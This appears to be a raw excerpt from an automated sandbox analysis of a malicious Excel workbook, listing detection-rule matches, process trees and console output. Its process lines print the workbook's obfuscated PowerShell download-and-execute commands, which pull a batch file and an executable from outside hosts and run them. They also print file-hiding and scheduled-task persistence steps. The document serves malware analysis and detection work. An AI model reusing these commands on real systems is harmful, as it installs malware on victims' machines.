        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 006811C5 appears 76 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 006B08FC appears 807 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 00411C35 appears 40 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 00680E81 appears 125 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 006850AE appears 35 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 005CEF10 appears 135 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 00411FB1 appears 172 times
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 00696B06 appears 45 times
        Source: C:\Users\user\AppData\Roaming\sb.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
        Source: spetsifikatsiya.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
        Source: dump.pcap, type: PCAPMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
        Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
        Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
        Source: classification engineClassification label: mal100.expl.evad.winXLS@40/19@2/4
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0042A2F9 __EH_prolog,CoCreateInstance,CoUninitialize,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\66EE0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\sb.exeMutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDFB4.tmpJump to behavior
        Source: spetsifikatsiya.xlsOLE indicator, Workbook stream: true
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.....................#.................F...............F.......A.....`IC........v.....................KJ.......&.....l.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....L................T.............}..v....8M......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....HQ......0...............H.o.....$.......(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....R................T.............}..v.....R......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....V...... ...............H.o.....".......(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....HW................T.............}..v.....W......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....G..................j......o...............T.............}..v....X^......0.................&.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....._................T.............}..v....._......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....S..................j......o...............T.............}..v.....d......0.................&.....^.......(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....pe................T.............}..v.....e......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v...._..................j......o...............T.............}..v.....k......0.................&.....Z.......(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j.....k................T.............}..v....Hl......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....k..................j......o...............T.............}..v.....s......0.................&.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....s................T.............}..v....Ht......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....w......0...............H.o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j.....x................T.............}..v.... y......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......o...............T.............}..v.....|......0...............H.o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....h}................T.............}..v.....}......0.................o.............(...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................5.j....0s}...............T.............}..v.....s}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....w}.....0...............X.I.....$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................5.j....xx}...............T.............}..v.....x}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....}}.....0...............X.I.....".......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................5.j.....}}...............T.............}..v....@~}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............P4.j......I...............T.............}..v....h.}.....0.......................`.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................5.j.... .}...............T.............}..v......}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............P4.j......I...............T.............}..v......}.....0.......................^.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................5.j......}...............T.............}..v......}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............P4.j......I...............T.............}..v....(.}.....0.......................`.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................5.j......}...............T.............}..v....`.}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............P4.j......I...............T.............}..v....(.}.....0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................5.j......}...............T.............}..v....`.}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v....p.}.....0...............X.I.....".......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................5.j....(.}...............T.............}..v......}.....0.................I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......P4.j......I...............T.............}..v....8.}.....0...............X.I.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................5.j......}...............T.............}..v....p.}.....0.................I.............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............................@{1.....................D.........................5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............m.o.d.e........./.......................0........$.J............/...............X...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... .1.8.,.1. .............................d.......m.o.d.e..........D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D.......................................................d.......m.o.d.e..........D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................@{1.....................D.........................5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............c.o.l.o.r......./.......................0........$.J............/...............X...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... .F.E. .................................d.......c.o.l.o..........D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`.......................................................d.......c.o.l.o..........D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`.......................................................D.........................5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............s.e.t.l.o.c.a.l./.......................0........$.J............/...............X...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`.......................................................d.......s.e.t.l..........D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ...................................................J....................D.......`{.J..............5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................f.o.r...........`{.J....................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.F...........`{.J....................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... .%.i. .i.n. ...=.4.-.5.................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............(.'.v.e.r.'.). .d.o. .5.................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............s.e.t...........d.o. .5.................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... .V.E.R.S.I.O.N.=.%.i...%.j. ...................s.e.t............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`................................D5.....................d........................D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................p.6......................................i5......................................i5.............
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............s.e.t............\6.......................5...............6........J....x.......................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... .V.E.R.S.I.O.N.=.6...1. .......................s.e.t....i5......................................i5.............
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................=.6...1.........................s.e.t....i5......................................i5.............
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................`{.J....................D........$.J..............5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............".6...1.". .=.=. .".1.0...0.". .................i.f. ............D5..................... .......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............(................D5..................... .......................d1......C..v....(..........................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................................................(................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............e.c.h.o.........}..v............................`.......B.......................................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D5.............h.......0.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... ..... ..........D5..............................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................................U.......................8............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................................................................r.e.g............D5.....................z.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>..............................................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..........................................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................T........................D5.............8...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v............................P.......t....................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ...................................t.i.m.e..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>............................................. ./.t. ..........D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ......................................... ./.t. ..........D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1...............................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v............................................................x............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ........................................................................D.......s.c.h.t..........D5.....................v.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1...............................................D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v............................P............................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ...................................t.i.m.e..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............1.>............................................. ./.t. ..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............n.u.l. ......................................... ./.t. ..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... ..... .........d1......................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............r.e.g...........d1......................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............................................................r.e.g............D5.....................T.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`..................................................................J.............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............). ................................................J.............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`................................D5.....................d........................D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...3.". ...................i.f. ............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D5.............................................d1......C..v....(..........................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................................................................(................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................................#.......................................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D5.............h.......2.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D5..............................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................................5.......................8............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v............................P.......X....................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................................v.......................x............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............t.i.m.e.o.u.t...}..v............................P............................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... ./.t. .3. . ...................................t.i.m.e..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................D........$.J..............5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............".6...1.". .=.=. .".6...2.". ...................i.f. ............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............(................D5.............................................d1......C..v....(..........................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................................................................(................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v............................................................................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D5.............h...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v............................................................8............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............t.i.m.e.o.u.t...}..v............................P.......8....................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`............... ./.t. .2. . ...................................t.i.m.e..........D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................`...............1.>............................................. ./.t. ..........D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. ......................................... ./.t. ..........D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ..... .........d1...............................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............s.c.h.t.a.s.k.s.}..v............................D.......].......................x............... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D.......................................................D.......s.c.h.t..........D5.....................v.......................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>.....................................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. .................................t........................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ..... .........d1...............................................D5.............x...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............t.i.m.e.o.u.t...}..v............................P.......{....................................... ..... .........
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ................................................J.............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D................................D5.....................d........................D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............................`{.J....................D........$.J..............5.............H...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............".6...1.". .=.=. .".6...1.". ...................i.f. ............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............(................D5.............................................d1......C..v....(..........................J....
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............C.m.d...........................................(................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............................................................C.m.d............D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ..............D5..............................................D5.............................................
        Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.............................B.......................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................X.......(.P.....................................................................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\sb.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\sb.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\sb.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: sb.exeString found in binary or memory: id-cmc-addExtensions
        Source: sb.exeString found in binary or memory: set-addPolicy
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
        Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\sb.exe {path}
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
